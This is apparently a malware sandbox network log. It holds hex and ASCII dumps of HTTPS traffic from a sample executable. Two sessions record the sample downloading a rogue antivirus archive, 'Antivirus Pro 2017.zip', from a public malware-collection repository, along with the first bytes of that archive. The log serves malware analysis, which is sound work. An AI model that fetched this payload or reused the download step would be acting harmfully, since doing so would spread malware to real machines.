                                                                                                        2022-09-29 12:46:09 UTC9446INData Raw: fb 29 1c 15 70 5e 55 63 3d 5f 7b 0c 3d ce 7b 0c ee 34 c1 d7 2c 6d 00 06 0a f7 c2 ff 30 5e d0 87 54 4d bf 8a 71 36 47 f4 0c cc 58 26 5f 91 93 fe 1b ef 5b b6 1e 04 ef cc 16 7e 6f ec 1b be 91 1b 5f 32 95 40 6d 80 46 d3 90 f5 a7 01 3b 92 cc 05 b1 f9 7c 68 fb 18 c0 d6 0a 13 22 a2 b8 88 ca 2f 73 b1 5f 30 1f 88 03 89 66 e9 56 a8 59 a5 51 5d 55 0c 96 23 ba 1f a6 c8 ac b2 4f 33 dc c9 31 65 43 43 ab d4 b7 96 54 36 0e eb a7 ab 93 61 b0 03 55 d0 1e 36 e1 c3 39 80 55 0e 47 49 9f 7c b4 81 62 24 7e 99 69 6c 15 db 0c 65 1e 1d 44 03 2c c5 68 4d 10 73 38 30 35 f3 d3 48 7d dc 15 bf fd 54 dc cf 60 12 77 63 90 1f 16 38 8a 55 5e 7d 53 91 29 03 b6 b2 81 42 2a 6a f9 1b 7e 85 b6 0d 87 2e e4 da ad 10 3f 72 f5 47 2f 72 4f c9 9f 37 75 4e d3 e0 9f 41 76 93 48 7a 36 c9 cb 74 1e 9c 24
                                                                                                        Data Ascii: )p^Uc=_{={4,m0^TMq6GX&_[~o_2@mF;|h"/s_0fVYQ]U#O31eCCT6aU69UGI|b$~ileD,hMs805H}T`wc8U^}S)B*j~.?rG/rO7uNAvHz6t$
                                                                                                        2022-09-29 12:46:09 UTC9462INData Raw: 7a a2 5c e7 a0 4d 10 3d 07 a7 ed ec f6 b2 f7 38 d0 32 14 52 b0 a0 4f 98 68 a1 3b 17 a8 dd e4 3a 81 9a d7 b8 8a 84 e3 d6 68 f9 74 31 54 74 f8 68 52 ba cf cc 54 ba fc de c0 71 e2 be 41 29 8b 5e fc 1c 9c c5 d0 3f 95 6a de b5 f5 6b 87 9f ee b4 ac 05 7d 65 fe 28 db 0f b8 94 da 02 03 48 2c 8a bf 29 cf 8f e6 fd 4e 23 65 22 ab 2a 39 0c 2a 23 17 27 b0 c8 ac 17 9b 83 07 df 4b ca 7b e6 00 32 5f 5b 79 5e 02 f6 00 b1 18 4e 75 26 ea c7 ed ef 47 33 f8 7d 39 de 2a f6 7f 46 b1 07 5f b6 9f 52 f5 3d b0 5b bb 42 da 6a 3d 57 80 9d a8 fa ec b9 4d fd 6c 9e 89 41 6a a0 00 d6 80 80 fa c6 67 60 f0 21 99 a8 e3 7f 80 2c 5d 0c d3 12 01 21 a2 75 d3 60 93 5b 6d 38 cb 72 96 79 c5 1d 86 47 71 80 85 db 30 1b f7 ed a0 54 c1 07 73 33 da c3 f7 de fb 28 46 94 83 b5 fc 3c 7c c6 57 7b 8d 70 47
                                                                                                        Data Ascii: z\M=82ROh;:ht1TthRTqA)^?jk}e(H,)N#e"*9*#'K{2_[y^Nu&G3}9*F_R=[Bj=WMlAjg`!,]!u`[m8ryGq0Ts3(F<|W{pG
                                                                                                        2022-09-29 12:46:09 UTC9478INData Raw: 01 60 a4 13 f2 fe 59 90 dc 0b 92 12 6c ac 1b 00 ad 25 7b 73 9e 4c 3d cd ea 2f b9 e9 53 bb de 7f f8 ff ab 9f 25 c4 1a f1 2a 8c 79 8f 2a 1b bf 3c 03 f5 6b f0 e3 c7 11 4c db 75 5b 1a 84 7c 91 8a 11 66 04 6e 0f a0 ab 34 44 25 05 2d 85 c6 9f 25 e9 57 b1 ca d5 95 c2 1d 00 5b 9f e4 df 8c 8c 7e bc ec 53 56 1a b6 db f5 a9 32 cf 80 d2 6a 62 aa 5a d9 d5 0e 9a f9 1a 61 12 a2 df d6 87 a5 de 7b 9c 97 db 91 35 29 2f 7a 61 66 e6 90 e4 a5 ae 32 47 33 6b 9b 5f b9 8c 51 75 c3 a8 b1 82 6d 8d 15 86 d2 12 04 e3 97 c5 5a 64 85 54 84 6c 23 ec 40 4f 53 53 9e ec 2e 30 b5 98 df ba 2a b0 2e 4d 9b 5e b6 8c 3a f6 36 f3 ea a9 bf cc 44 b1 c3 14 47 3c 75 33 1a c8 e9 e3 da ad b5 86 c5 24 ad 7b 2e c8 37 6b 72 6c 01 8a 7e 65 43 92 5e ed 3d 93 b0 8a 2c 54 03 d1 9d bd 85 12 97 69 33 16 bd fb
                                                                                                        Data Ascii: `Yl%{sL=/S%*y*<kLu[|fn4D%-%W[~SV2jbZa{5)/zaf2G3k_QumZdTl#@OSS.0*.M^:6DG<u3${.7krl~eC^=,Ti3
                                                                                                        2022-09-29 12:46:09 UTC9494INData Raw: f7 55 15 ee 9a d7 f4 39 69 70 5a cc 11 d7 c6 80 2e eb 2f 8f 33 0a 04 64 5a 68 56 80 3e 60 1a 2e 1f c7 99 68 8e c6 c0 f3 9a 4f ca 21 3b 6f 9e 90 9b a7 35 3b 2a 34 3b 2b ce 1c a9 2d 2d f8 e3 b6 77 9a 41 bc 30 e2 e4 30 e6 59 4c df 9c a9 38 9d 2f 29 16 a4 aa d5 76 12 0a 8d 17 f7 0e 23 bc 6f 0d 6a 2e 9a 18 13 ec 9e 38 fb 36 fa dd 65 09 a5 40 96 21 0e 8f 3b d0 d9 56 38 f4 40 17 03 fb 41 2f c4 46 3a 30 af ea d5 d0 0b 7d 9b af c8 82 4e 34 8a 7e 43 19 a0 05 93 cc b1 66 27 b1 42 d8 42 5f b9 de ab b5 e0 de 33 ce 12 58 6e 2c 52 4c f0 7f 7b 1b de 0b 95 f6 d8 a6 a0 01 31 e0 67 5b 3e b6 54 90 0f 3e c1 dc 25 66 3c d4 34 aa f8 37 b6 7f 87 c8 18 f6 1c 66 62 51 8c 0a eb 40 9f 9f 2a f0 22 2a d7 04 ce 33 ab d7 33 27 15 06 f3 07 92 c9 92 51 f2 27 ca 44 f9 9b bc f3 ab fc 57 f7
                                                                                                        Data Ascii: U9ipZ./3dZhV>`.hO!;o5;*4;+--wA00YL8/)v#oj.86e@!;V8@A/F:0}N4~Cf'BB_3Xn,RL{1g[>T>%f<47fbQ@*"*33'Q'DW
                                                                                                        2022-09-29 12:46:09 UTC9510INData Raw: 0e b3 80 3f ed 8c 8d da 04 18 72 25 02 70 b1 72 5d 8f f0 6a 90 3b 4d 49 da c0 f0 73 06 73 1b aa 90 91 d7 78 91 9f 5d 10 75 d4 91 cb e0 e1 67 60 9e 65 60 dc 81 e7 f5 4b ec fb d4 57 40 28 68 f9 c5 30 a6 eb e3 c2 2a 6b 85 7a b2 9b b7 5f fb 32 98 62 2d cb 50 f0 b2 09 54 56 50 d5 f9 8f 98 e9 21 fe 2b 0e e0 b7 65 df 11 f4 c0 ea c7 77 ec 46 9f e7 d3 cd 17 a2 05 34 bb dc c3 22 e9 7c 36 46 7b 23 9a ff 3e 3b 65 d0 9c d4 10 99 b2 04 a1 da 8d 1c 2d bb 02 49 d4 47 4a 1a 83 0b 44 5c 93 54 71 e5 31 d1 81 43 99 56 c1 e8 59 3c b9 4c 0f 4f 90 bb a4 11 d9 78 b4 0f c8 d4 c0 6e a1 bb 23 66 f3 cf e3 68 d2 56 04 9a 2a 53 24 57 39 c8 3e cd 7d 50 44 53 79 0c f8 ec 11 b0 86 52 3b 7c 04 89 63 6a b7 72 28 ca 4c 63 a6 ed d7 16 d3 67 b2 17 7f af 9c c2 51 c6 fa 0e b3 4a ce 55 c7 b5 b0
                                                                                                        Data Ascii: ?r%pr]j;MIssx]ug`e`KW@(h0*kz_2b-PTVP!+ewF4"|6F{#>;e-IGJD\Tq1CVY<LOxn#fhV*S$W9>}PDSyR;|cjr(LcgQJU
                                                                                                        2022-09-29 12:46:09 UTC9526INData Raw: 6e 86 9e 57 f3 a3 a1 af 1e f5 d4 2a a9 e2 78 7c 17 83 72 95 5f a4 9a 7b 1c 1e 02 17 ea 94 8c ba e8 6e 82 ff 90 d4 33 f4 3b 9d 30 a1 3c 84 86 af 11 92 cf e6 90 d7 5b c5 96 bc 00 33 fe b3 a5 9a 5b 24 55 85 99 43 b7 7d e4 a2 16 e3 0d 5f dd 9e 50 7b ce 30 ed 6a 4f 02 8e 91 d1 41 a1 39 6e b2 fe 1a 76 15 e0 6f 37 28 25 21 f3 9d 61 70 1a 0c ee c6 e6 03 a0 38 90 df 45 77 ad f5 0c bd db d1 ea fe 68 38 ab d6 07 06 1e 0f 06 39 35 f7 52 6f a4 a2 cc 5b f9 88 92 9f 1b 09 b6 74 70 54 6b 61 9e 4e 24 b4 ca b9 55 27 16 eb 00 16 16 0f 4b a2 b6 58 5e f8 b7 d2 7b 1d 9f ca 64 99 a0 82 c1 43 b6 fe e2 85 da fd 98 98 e1 e0 84 21 3e dc 76 ff b7 0c ca 30 62 15 6e 2b 2a fc e0 0c 4a 92 c5 6a 77 6b b7 2c 42 de ab 23 96 fe c1 15 10 0f 29 c3 00 a0 14 da bb f6 c6 e5 02 3e 74 f6 e6 a4 11
                                                                                                        Data Ascii: nW*x|r_{n3;0<[3[$UC}_P{0jOA9nvo7(%!ap8Ewh895Ro[tpTkaN$U'KX^{dC!>v0bn+*Jjwk,B#)>t
                                                                                                        2022-09-29 12:46:09 UTC9542INData Raw: 68 99 e6 fa 27 91 00 fb a3 f3 6d bb db 25 cd e8 cd fb 64 ad 8b e1 84 48 05 e4 6a 43 f8 0d de d3 f4 f6 8d cd 8b 92 72 00 7d e3 eb 76 a9 5e 43 bd 2f 18 21 88 da 2c 79 e2 5e 0a 56 1f ed 20 b2 04 08 1d 5a 8d 17 12 8b f5 ac eb b7 91 c1 6d 68 bb a2 89 10 c7 6c 1f 6b 95 ce 1f 87 ad f1 ae fa 9b b1 de 63 b2 dd 6b fb cc 60 41 17 7e 69 2a 1a 19 9b 6f 3e c7 d4 f7 f2 fc a1 d4 b7 de 1a c7 7c c7 18 bc 7d 5f 2b c5 80 1c a4 73 49 30 bd 9c 95 09 bb f3 24 b3 e4 20 4e 2d 79 3a 12 bd 50 ae 86 1b a8 68 32 0f 98 c7 fc 26 5e 49 bd 52 50 f8 9d f2 64 ea 21 b6 a5 02 54 68 b8 ef 69 b7 3b e0 40 c4 6c 8f bf e0 49 0d 70 f1 57 da 09 b3 61 3c 68 f3 8d b2 c5 36 99 71 cd b7 9b 40 41 c9 73 f0 fc f8 94 fa 8e 21 b3 f8 74 7a 13 79 c6 ab c5 87 50 6e a4 60 d4 7c 92 9e 55 ef b6 d4 ab d9 db a5 02
                                                                                                        Data Ascii: h'm%dHjCr}v^C/!,y^V Zmhlkck`A~i*o>|}_+sI0$ N-y:Ph2&^IRPd!Thi;@lIpWa<h6q@As!tzyPn`|U
                                                                                                        2022-09-29 12:46:09 UTC9558INData Raw: 4d 84 2a 5a 5e a3 2b 01 73 48 17 f5 fc 9d bf 3f 70 7d 5a 87 68 21 44 4f 5d 21 62 b6 63 25 9f f2 db 04 7a dc 98 e3 14 26 82 c9 26 ed a9 02 e6 05 42 c8 62 bf 72 41 0a c2 eb 61 31 2b 6d 49 fe 71 1f f0 cd ba 20 f8 fd 8c fc 2c 82 80 47 2a c6 31 ab 4c 46 45 2e 6a 0e e4 cb 60 b4 51 af 64 5c 20 f0 0f 09 0d 67 8f 71 d7 f7 e7 c3 7d fe 73 55 45 6f 8e ae 25 ef bd b5 d3 e4 8d 11 5c 38 1f 3a a0 fd bd e7 99 d8 8c 26 1c 77 d3 ae dd 2c 1a 9d d0 25 89 28 fd 6e f9 e4 e8 c7 c6 0d ed a9 72 a6 c0 d0 ff ca ea 04 b4 1b c3 b1 c4 8d 13 ce db 83 79 d1 01 5c 55 a4 b9 7d 19 37 f9 27 c0 95 14 46 37 bc b0 1a a5 43 d0 5d f5 8e 8f 1f bf fb 84 ce bc c2 77 d7 33 e1 95 bc 58 9e 1e 39 8a 0a 7c 16 6c 8e 5e 5e 5e 40 f0 a4 d9 81 76 1b 3c d8 18 1b 03 51 bf 45 2c de ab 06 22 a3 ca da a7 99 3b 9a
                                                                                                        Data Ascii: M*Z^+sH?p}Zh!DO]!bc%z&&BbrAa1+mIq ,G*1LFE.j`Qd\ gq}sUEo%\8:&w,%(nry\U}7'F7C]w3X9|l^^^@v<QE,";
                                                                                                        2022-09-29 12:46:09 UTC9574INData Raw: cb c7 57 e5 62 c6 a5 55 40 1e f3 27 ee 5b 9e 7b f1 3e e4 dc cf d0 b2 4c dd e1 ff 91 91 46 61 59 7a b9 0f c0 f6 d1 56 0a ff ff 8a bd a2 0b 1d e2 c2 19 3f ef 4f 21 34 c9 bf a2 59 d7 99 4d 69 92 b6 e6 74 eb cb c4 13 85 34 b5 79 c5 0c cc b0 04 08 00 54 4d 95 d8 4d 27 1b c4 ce ea d2 f3 6b e4 00 6f 4c 48 41 33 c5 21 0c 89 0b 1d ba df 28 f9 8f fb 41 f2 8e ef 36 97 94 6f 00 60 0d fc bc cc e8 56 1e be d1 e2 60 85 82 1d 8a 5d b8 dd c0 eb 1d 35 95 61 34 11 9c 37 66 17 28 da bb 89 9e b8 e6 78 41 3a 8e 96 6e 58 11 8c 08 96 7a ce b3 fb 2c 7b 24 cc df 49 8a c6 46 41 50 69 f1 5e cc 9f 1c a9 78 7e 65 1a 21 2a 9d 46 54 b2 fd 82 5c 91 8e b0 23 6b 5f 59 c1 2c 60 80 14 9a aa c1 30 39 00 da d2 33 e9 8d 1d 1b e0 de b2 87 1d ed bf a9 34 d1 a1 e4 f9 b5 35 a1 9f 12 34 a6 b2 a7 26
                                                                                                        Data Ascii: WbU@'[{>LFaYzV?O!4YMit4yTMM'koLHA3!(A6o`V`]5a47f(xA:nXz,{$IFAPi^x~e!*FT\#k_Y,`093454&
                                                                                                        2022-09-29 12:46:09 UTC9590INData Raw: 44 3d d8 6c 38 d3 b2 59 5d 57 40 50 d0 23 9c 7b 9d c1 11 69 52 82 bf b6 e4 78 3f 8c 96 1b 2d c7 11 f7 d8 66 0f d8 6b a5 a9 d2 c3 38 9a e9 20 aa d5 4e 6e 5e 02 f9 48 19 6d d7 ec d3 68 a7 56 88 0e 8b 11 0f 7b 73 dd b3 d0 bb e0 7a 4c 45 6e fb 51 d2 45 53 8a d7 3c 1e 94 90 24 86 49 79 df c2 43 be 6f d3 96 cc a0 f5 33 d3 90 fb 41 bd 6e b8 a0 83 14 cf a8 cf 54 4f 4d 3a af 10 b0 81 8d 47 70 3f 28 b9 95 c9 61 44 45 53 6b ab 19 9a e9 0e 03 cd 8d 4e ba ba 82 de 1d ef 89 e6 18 e9 9f fc 2d 05 e2 3c ae 35 72 3c 7b 4f 10 2b db 32 a3 9d 64 c7 4a 47 75 0e f4 ad 4b af 85 b2 a1 5a 91 48 01 c2 c2 78 d8 5a 8d 4d d2 54 3f d0 dd 07 72 8f 26 65 3f 1c 7b 74 5f bc d6 b9 75 04 11 7c 53 e7 cd 7d f9 d5 dc 62 0a 6b ed b5 ae e8 d0 77 a9 ae 47 2a 7c fb 69 04 bb 29 f7 71 77 fc de 4b ca
                                                                                                        Data Ascii: D=l8Y]W@P#{iRx?-fk8 Nn^HmhV{szLEnQES<$IyCo3AnTOM:Gp?(aDESkN-<5r<{O+2dJGuKZHxZMT?r&e?{t_u|S}bkwG*|i)qwK
                                                                                                        2022-09-29 12:46:09 UTC9606INData Raw: 9b 72 06 41 e0 9d 1b dc 07 6a 2e 05 98 0d 2a 4c f3 11 6e 08 7e ed 7f 55 30 df b6 17 9e 61 c9 80 a7 c6 6e 55 3c 81 2a 04 9a 10 9b db 26 d9 45 9d 76 64 bd 5a be 80 ac 11 3f a9 be 29 83 79 0d b6 1e 83 46 f7 bf 3b bc ad 45 ba 44 6b b0 3b a6 40 a6 45 8c fc 09 b1 39 c7 04 8d 02 15 b4 3a d3 62 c6 82 3e 8e 7d 63 05 d3 e8 90 77 75 31 33 92 ee 8f df 2c aa d1 d5 a2 ca 14 5f dc 7a 99 c9 28 cf a9 b9 7a 19 9f b2 18 29 7e 52 4e 74 96 5d 87 ef 9c fb e0 1f 09 bb 43 a6 ff f5 a4 86 c0 7c ce de f5 d4 f0 a7 ef 5f 72 25 fa 62 ce 19 61 60 23 d4 0a 6a f9 83 0f 1f 31 29 26 64 8e 02 58 92 bc 7f 16 87 2e 60 3e fa 93 66 3a 08 a2 4a 09 6f 1d 42 59 5a 35 90 c2 73 1e 34 64 28 57 c3 22 9d 90 77 1c 86 40 6a 6b e5 b6 2a 6c 9d 10 19 4e 2a bb 12 2e 97 b6 97 db fe 06 3f 49 11 07 72 c3 16 10
                                                                                                        Data Ascii: rAj.*Ln~U0anU<*&EvdZ?)yF;EDk;@E9:b>}cwu13,_z(z)~RNt]C|_r%ba`#j1)&dX.`>f:JoBYZ5s4d(W"w@jk*lN*.?Ir
                                                                                                        2022-09-29 12:46:09 UTC9622INData Raw: 93 82 6f d6 2d 33 12 53 20 bf cb 3c a2 87 27 34 d0 90 fe a5 fc fb 1f 96 9a ec f9 10 dd 00 0b 39 a3 aa 3f d5 eb 14 97 67 13 67 37 27 19 91 d0 27 f7 8e 52 35 68 4d 17 bc 70 7d 4b 8e 30 84 9f 1b 5a 7d 4c 5f fd 00 ff 0e 1e 49 68 26 1d 18 52 58 cb 24 c9 8f b1 68 b3 90 fe c8 61 b8 22 d6 bc 33 97 be 61 8c 95 6d 47 f3 7d 5e 28 c3 27 5a 51 f3 f7 19 52 8b 67 1c 63 a1 0b 6e e0 0b fb a0 9c 21 36 ad 6a f5 30 48 02 b2 6a 48 c9 a8 54 78 ae 30 26 8b 36 ad 52 e0 d5 e4 73 c6 66 43 a9 d4 f3 5f 3a c8 a5 bd e2 36 a0 c4 f0 63 d6 52 aa 1b 5a c4 4f ac 02 af 8c e4 2b 69 48 ba c7 81 99 df 1e e5 6a 19 78 e6 78 93 9b 66 f1 af b6 e0 1d d6 5b 0a fe 02 a9 50 f2 16 03 86 4b dd 7e 4a e3 3f 6f 52 11 2c e3 7f e0 cd a7 c8 cd ad 82 9d a6 2c 74 57 0b 9f 2a 84 b3 39 ef 54 eb 66 1c 1c 09 fb 02
                                                                                                        Data Ascii: o-3S <'49?gg7''R5hMp}K0Z}L_Ih&RX$ha"3amG}^('ZQRgcn!6j0HjHTx0&6RsfC_:6cRZO+iHjxxf[PK~J?oR,,tW*9Tf
                                                                                                        2022-09-29 12:46:09 UTC9638INData Raw: 35 9c 6c c4 3d 34 cc a7 b6 ff 3b 50 8e 31 32 f8 ce e2 30 bb 9a c6 d3 cd 36 69 72 32 c2 9d c5 0f d7 ec e6 9e 2c f3 af bb 90 a4 57 a1 0a c7 64 e4 9d 06 11 b8 1f da 2c 8b 05 98 43 49 d6 53 6b 25 47 82 74 92 f3 08 6f f6 e1 6e ec 23 90 97 86 e4 8d 49 5a 43 81 31 7f 4b 17 49 39 d3 f0 23 69 67 bf 75 58 0b 82 9a 96 25 59 b0 79 a4 94 07 12 84 2f e5 81 66 33 be 7e 3e 96 eb cd 50 86 73 24 67 81 5e 4e 61 40 b0 77 7c 75 8a cc c4 ae 04 71 f4 64 72 d0 5f 49 7a 61 35 e3 59 cc da 1b 05 6b 18 ba 2e 18 b9 66 db 97 49 dd 25 42 60 8d 95 ff b2 60 24 a1 70 b9 ea 2e d7 39 1a d1 51 d0 ef 16 02 8f 13 15 de 3d bc 5b f5 35 dd 97 71 a2 6c 9d 72 bf 7b 38 1c 9a a4 14 68 21 7c d5 a9 b2 0b 97 b0 4c 00 08 07 a0 81 ba 31 5c 30 81 d6 46 30 8f 90 24 5c 78 ff 96 fb 90 92 d4 f0 a9 70 18 10 22
                                                                                                        Data Ascii: 5l=4;P1206ir2,Wd,CISk%Gton#IZC1KI9#iguX%Yy/f3~>Ps$g^Na@w|uqdr_Iza5Yk.fI%B``$p.9Q=[5qlr{8h!|L1\0F0$\xp"
                                                                                                        2022-09-29 12:46:09 UTC9654INData Raw: f0 15 65 01 e7 77 0e a3 7d 7e 4f 84 60 c7 de 7f a2 d7 3d 2e d6 46 a5 ec 0d 22 64 37 08 e9 50 c3 66 bc 31 5b f6 e4 23 37 c9 f9 0d 5c a1 9b c3 21 ca 69 2a 60 e7 25 fd ff 84 d0 c5 3b 1e 02 74 e4 48 b2 b7 92 1d 10 95 fd 97 b2 b8 7b c9 e8 fa 09 d5 65 a4 9c b2 22 bf 3f e9 e6 bb e7 ce 2c be 89 b3 2e 77 54 18 d5 78 fe 5b e7 54 ae 19 f7 2e 65 3a ca 92 31 f5 2b fe 2c 1b 17 50 2b 74 08 cf e4 b6 65 3b 59 eb 7b 4b 8e 69 1e d6 2d ef 6e ca 6b 6c e8 3a 33 1d 5d 58 88 40 9e b0 a2 75 5b 30 f7 46 51 c7 5c 5d 51 e9 5e 75 60 9f 88 91 f2 6b 30 2d 1b ef 70 8b f4 0e 71 0f 62 12 6f d8 f9 bf 84 f9 fb 98 52 43 30 3b e9 45 2b f4 29 7a ee dd bd 8b 7f 94 26 da 14 85 d6 63 81 9d e2 a2 d4 b1 88 93 ce 25 5e a1 71 a3 a3 f4 ed 47 f5 76 98 ad 57 b8 60 85 86 8b da 2b 0c 8f 69 db 97 b3 28 bd
                                                                                                        Data Ascii: ew}~O`=.F"d7Pf1[#7\!i*`%;tH{e"?,.wTx[T.e:1+,P+te;Y{Ki-nkl:3]X@u[0FQ\]Q^u`k0-pqboRC0;E+)z&c%^qGvW`+i(
                                                                                                        2022-09-29 12:46:09 UTC9670INData Raw: e0 63 e5 af de 2a 2e 5f be 39 b2 f5 5b 85 53 ff 58 a4 6d 7e 00 b8 04 79 cd fb 28 9e fe 11 b1 b2 c8 23 8a 91 ab 82 a9 7e 8e 0b fb 86 02 7e 37 68 68 2d b0 8b b9 4a 50 c0 43 d7 57 87 03 2c bd 15 d1 a9 fd ba 02 20 f5 27 51 2c a9 ad 76 48 d4 a9 6a 87 f6 f5 b2 32 c0 b7 1f 5c e4 b9 6b 16 d2 b2 37 85 3a 8f c2 7e fe 82 3d 6c 78 d2 b6 3b 32 b8 23 18 cc 2d fc 78 31 09 bb 71 d0 51 c4 b0 7b 54 03 3c c6 fc 89 fe 01 66 b6 5b 2b 4c 7d bc 14 79 40 ee 83 a1 ce c5 db 44 6f f3 48 6c 89 d5 1d 91 a9 1c dc 20 70 06 53 b7 94 74 86 37 d8 8f 06 80 fe bf 1a 3f 72 11 7c 35 fc d5 f4 56 e8 40 83 46 59 09 34 89 3d 06 d9 cb 1b 92 51 fa f0 fc e3 44 25 2f 74 14 83 2d 86 6e 70 1f 68 70 fe 05 e0 61 9b 17 99 1c 94 ed e0 09 36 54 6b 1a ec 3e 47 97 50 e0 5f 55 fa 23 65 cc a4 13 28 37 fb 30 f4
                                                                                                        Data Ascii: c*._9[SXm~y(#~~7hh-JPCW, 'Q,vHj2\k7:~=lx;2#-x1qQ{T<f[+L}y@DoHl pSt7?r|5V@FY4=QD%/t-nphpa6Tk>GP_U#e(70


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.449777140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:11 UTC9682OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:46:11 UTC9682INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:21 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:46:11 UTC9683INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.449778185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:46:11 UTC9685OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:46:11 UTC9685INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 813771
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "1678d463fe21840e0502334b52db05d49c7f0867ee8fb74db3e4927c4d982da5"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 3596:11E0C:3902DE:4007EA:6335934F
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:46:11 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6936-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455571.300330,VS0,VE2
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: 5584596075debb3a253d4a23df8c239209963e18
                                                                                                        Expires: Thu, 29 Sep 2022 12:51:11 GMT
                                                                                                        Source-Age: 68
                                                                                                        2022-09-29 12:46:11 UTC9686INData Raw: 50 4b 03 04 14 00 01 00 08 00 cc 71 b9 46 6e c1 a3 ac 07 6a 0c 00 55 c0 0c 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 72 6f 32 30 31 37 2e 65 78 65 25 07 aa cf 03 18 83 7f 90 f2 82 f4 4a c8 91 04 12 f4 c4 35 54 d1 11 fd 0b 95 82 b9 13 b7 bf ef ba 38 2e 1d 4b d8 08 b2 b2 43 b5 a3 c0 d7 77 ed 2b c1 26 7f 20 26 33 e5 c7 4d 54 26 f0 44 95 ed 24 60 75 a5 2f 65 d6 52 1e 72 1c ea 7f a8 b3 3d 44 30 b5 dc dc db 90 fe 82 c7 fd 4f 86 8d 27 85 b6 72 8e ae 12 2a ad b0 25 90 de 7a 75 d2 aa 99 19 f6 fd 5d 6e 54 90 91 de 62 38 63 db c3 14 35 94 7b 01 85 fb c5 24 57 65 48 4b 7c b8 4f 63 62 d8 e8 e9 04 68 da 36 23 dc 71 44 85 2a 59 00 ea 11 b8 97 f1 d7 5c 82 74 12 86 14 b2 3f 6d 49 f9 0b 3b d7 5f 0f 8d 62 6d f9 90 02 8f e6 1d e4 fc 16 80
                                                                                                        Data Ascii: PKqFnjUEndermanch@AntivirusPro2017.exe%J5T8.KCw+& &3MT&D$`u/eRr=D0O'r*%zu]nTb8c5{$WeHK|Ocbh6#qD*Y\t?mI;_bm
